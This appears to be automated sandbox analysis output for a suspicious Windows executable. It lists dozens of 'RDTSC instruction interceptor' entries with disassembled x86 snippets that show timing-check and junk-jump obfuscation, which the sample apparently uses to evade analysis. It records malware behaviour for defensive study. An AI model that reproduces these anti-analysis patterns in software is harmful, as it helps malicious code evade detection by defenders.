Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930911 second address: 593092A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 and ecx, 1Fh 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f mov ax, 7441h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 593092A second address: 5930957 instructions: 0x00000000 rdtsc 0x00000002 mov bx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jmp 00007FD164C5471Ah 0x0000000c popad 0x0000000d ror eax, cl 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD164C54727h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930957 second address: 593095D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 593095D second address: 5930961 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930961 second address: 5930976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 leave 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD164D1C75Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930976 second address: 5930993 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00FA2014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007FD16962517Eh 0x00000024 push FFFFFFFEh 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edx, ax 0x0000002c mov dl, cl 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930993 second address: 59309DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C766h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007FD164D1C760h 0x0000000f ret 0x00000010 nop 0x00000011 push eax 0x00000012 call 00007FD1696ED1EEh 0x00000017 mov edi, edi 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD164D1C767h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59309DA second address: 59309DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59309DF second address: 59309FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edx, ax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b pushad 0x0000000c mov dl, ch 0x0000000e mov bl, B6h 0x00000010 popad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD164D1C75Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 59309FF second address: 5930A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930A05 second address: 5930A24 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD164D1C764h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930A24 second address: 5930A38 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 5074h 0x00000007 mov cx, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 5930A38 second address: 5930A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E001A second address: 58E0020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0020 second address: 58E0024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0024 second address: 58E0028 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0028 second address: 58E0055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FD164D1C75Eh 0x00000012 xor ax, 46C8h 0x00000017 jmp 00007FD164D1C75Bh 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0055 second address: 58E00A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FD164C5471Eh 0x00000011 mov ebp, esp 0x00000013 jmp 00007FD164C54720h 0x00000018 and esp, FFFFFFF8h 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FD164C5471Ah 0x00000024 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E00A6 second address: 58E00B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E00B5 second address: 58E00EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 04CDBADAh 0x00000008 mov dh, AAh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e pushad 0x0000000f push esi 0x00000010 jmp 00007FD164C5471Fh 0x00000015 pop ecx 0x00000016 mov dh, 0Ah 0x00000018 popad 0x00000019 push eax 0x0000001a jmp 00007FD164C5471Bh 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E00EB second address: 58E00EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E00EF second address: 58E00F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E00F5 second address: 58E010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E010A second address: 58E010E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E010E second address: 58E0114 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0114 second address: 58E0123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C5471Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0123 second address: 58E0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FD164D1C761h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FD164D1C75Eh 0x00000017 mov ebx, dword ptr [ebp+10h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD164D1C75Ah 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0174 second address: 58E0183 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0183 second address: 58E01AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 0722B8BEh 0x00000012 mov eax, edi 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E01AC second address: 58E01CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54720h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push edx 0x0000000c mov edi, esi 0x0000000e pop esi 0x0000000f mov ecx, ebx 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E01CF second address: 58E01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD164D1C75Ah 0x0000000a sub cl, FFFFFFE8h 0x0000000d jmp 00007FD164D1C75Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E01EE second address: 58E01F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E01F4 second address: 58E01F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E01F8 second address: 58E0238 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b jmp 00007FD164C54727h 0x00000010 xchg eax, edi 0x00000011 jmp 00007FD164C54726h 0x00000016 push eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0238 second address: 58E023C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E023C second address: 58E0242 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0242 second address: 58E0287 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a jmp 00007FD164D1C766h 0x0000000f test esi, esi 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FD164D1C767h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0287 second address: 58E029B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD1D6B02A9Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E029B second address: 58E02A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E02A1 second address: 58E0318 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000010 jmp 00007FD164C5471Eh 0x00000015 je 00007FD1D6B02A76h 0x0000001b jmp 00007FD164C54720h 0x00000020 mov edx, dword ptr [esi+44h] 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FD164C5471Eh 0x0000002a jmp 00007FD164C54725h 0x0000002f popfd 0x00000030 mov si, 75F7h 0x00000034 popad 0x00000035 or edx, dword ptr [ebp+0Ch] 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0318 second address: 58E031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E031C second address: 58E032B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E032B second address: 58E035C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C769h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edx, 61000000h 0x0000000f pushad 0x00000010 pushad 0x00000011 mov bx, ax 0x00000014 push esi 0x00000015 pop ebx 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 mov ax, 71B7h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0976 second address: 58D09F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD164C54727h 0x00000008 pushfd 0x00000009 jmp 00007FD164C54728h 0x0000000e jmp 00007FD164C54725h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xchg eax, esi 0x00000018 jmp 00007FD164C5471Eh 0x0000001d push eax 0x0000001e jmp 00007FD164C5471Bh 0x00000023 xchg eax, esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD164C54720h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D09F2 second address: 58D09F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D09F8 second address: 58D0A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, F013h 0x00000007 mov ch, 7Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov esi, dword ptr [ebp+08h] 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FD164C54721h 0x00000016 xor esi, 2FCE82D6h 0x0000001c jmp 00007FD164C54721h 0x00000021 popfd 0x00000022 pushad 0x00000023 mov ebx, esi 0x00000025 mov dl, ah 0x00000027 popad 0x00000028 popad 0x00000029 mov ebx, 00000000h 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 mov dl, ch 0x00000033 popad 0x00000034 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0A44 second address: 58D0A4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ah, 81h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0A4B second address: 58D0AB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 test esi, esi 0x00000009 jmp 00007FD164C54723h 0x0000000e je 00007FD1D6B0A03Dh 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FD164C54724h 0x0000001b sub ch, FFFFFFB8h 0x0000001e jmp 00007FD164C5471Bh 0x00000023 popfd 0x00000024 mov ax, A1EFh 0x00000028 popad 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 pushad 0x00000031 movzx ecx, di 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FD164C54723h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0AB7 second address: 58D0AD2 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov ecx, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD164D1C75Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0AD2 second address: 58D0AD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0AD6 second address: 58D0ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0ADC second address: 58D0AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C54723h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0AF3 second address: 58D0AF7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0AF7 second address: 58D0B3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007FD1D6B09FBAh 0x0000000e jmp 00007FD164C54725h 0x00000013 test byte ptr [77816968h], 00000002h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD164C54728h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0B3D second address: 58D0B4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0B4C second address: 58D0B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FD1D6B09F63h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD164C5471Dh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0B7E second address: 58D0BAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C761h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FD164D1C763h 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0BAF second address: 58D0BF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54725h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD164C5471Ch 0x00000011 sub ch, FFFFFFE8h 0x00000014 jmp 00007FD164C5471Bh 0x00000019 popfd 0x0000001a mov cx, F3DFh 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0BF2 second address: 58D0BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0BF8 second address: 58D0C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD164C54724h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0C10 second address: 58D0C48 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d mov bx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 pushfd 0x00000013 jmp 00007FD164D1C75Eh 0x00000018 add ax, EFD8h 0x0000001d jmp 00007FD164D1C75Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0C48 second address: 58D0C97 instructions: 0x00000000 rdtsc 0x00000002 mov di, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebx 0x00000009 jmp 00007FD164C54722h 0x0000000e push eax 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 push ebx 0x00000013 pushad 0x00000014 popad 0x00000015 pop esi 0x00000016 popad 0x00000017 xchg eax, ebx 0x00000018 jmp 00007FD164C54725h 0x0000001d push dword ptr [ebp+14h] 0x00000020 pushad 0x00000021 mov ax, B1F3h 0x00000025 mov dx, cx 0x00000028 popad 0x00000029 push dword ptr [ebp+10h] 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0C97 second address: 58D0C9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0C9B second address: 58D0CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58D0CA1 second address: 58D0CA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0D58 second address: 58E0D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C54726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD164C5471Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0D81 second address: 58E0D87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0D87 second address: 58E0DC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 mov ax, 2E4Fh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007FD164C54725h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 call 00007FD164C54723h 0x0000001b pop eax 0x0000001c push edi 0x0000001d pop eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0DC4 second address: 58E0E36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD164D1C760h 0x00000009 jmp 00007FD164D1C765h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FD164D1C760h 0x00000015 jmp 00007FD164D1C765h 0x0000001a popfd 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FD164D1C768h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0E36 second address: 58E0E45 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164C5471Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0A89 second address: 58E0AD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD164D1C75Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FD164D1C764h 0x00000010 mov esi, 2B4D0A51h 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007FD164D1C767h 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushad 0x0000001f mov si, 0531h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0AD5 second address: 58E0AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ax, D033h 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FD164C5471Bh 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0AF2 second address: 58E0AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0AF7 second address: 58E0AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\pud8g3zixE.exe	RDTSC instruction interceptor: First address: 58E0AFD second address: 58E0B01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
